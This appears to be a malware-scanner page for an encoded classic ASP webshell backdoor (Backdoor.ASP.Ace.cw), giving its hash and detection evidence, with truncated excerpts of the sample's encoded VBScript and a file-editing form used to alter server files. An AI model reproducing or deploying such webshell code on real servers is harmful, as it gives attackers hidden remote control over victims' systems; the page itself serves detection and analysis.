Hostile 92% Download

Backdoor.ASP.Ace.cw

Encoded ASP webshell backdoor

Webshell in VBscript or JScript encoded using *.Encode plus a suspicious stringClassic ASP VBScript.Encode language directive
SHA-256ce85600d916d0f9a6c84da4b0da1ea79195eec89c4035aa20b7cd6e656b106c7
MaleculeO(C)Th

Evidence

Classic ASP VBScript.Encode language directive lines 1–2
1<%@ LANGUAGE = 'VBScript.Encode' %>
2<%#@~^RWoBAA==@#@&@#@&ifb:PDt)mD~~/:khnBPlk2nmYtB~"6.o1xSPdOMACm09WKDS~6/WpS,/C(B~S/p@#@&@#@&dkKbh+,'~Kb:n.@#@&dD4+zmY{~]+$E/O`EO4+)mDE#@#@&7"Xyo^U,'~I5!+dD`ry6.o1UJ*@#@&dm/2KmYt,xPU+D7n.RtlanCY4crRE#@#@&did77id@#@&7@#@&7ZKUkY~sP{PJ.6.Lm J7@#@&d/G /Y,dtKhSKLr …
Webshell in VBscript or JScript encoded using *.Encode plus a suspicious string lines 5–7
5:33… OnlineView.height=this.document.body.scrollHeight+10;" leftmargin="0" topmargin="0">
6<form name=form1 action="?Type=2&FileName=<%=#@~^CAAAAA==obVngls+AQMAAA==^#~@%>" method=Post><textarea Name=Content cols=90 rows=25><%=#@~^HgAAAA==jD-DcCKtSAUmKNn`wksn;WxDnxD#1AoAAA==^#~@%></textarea><br><br>
7<input type=button value=Save onclick="document.all.form1.submit();"> <input type=button …

Keyboard shortcuts on this page: j for the next sample, k for the previous one, x to go back to the feed, d to download the original bytes, r to re-queue the sample for analysis.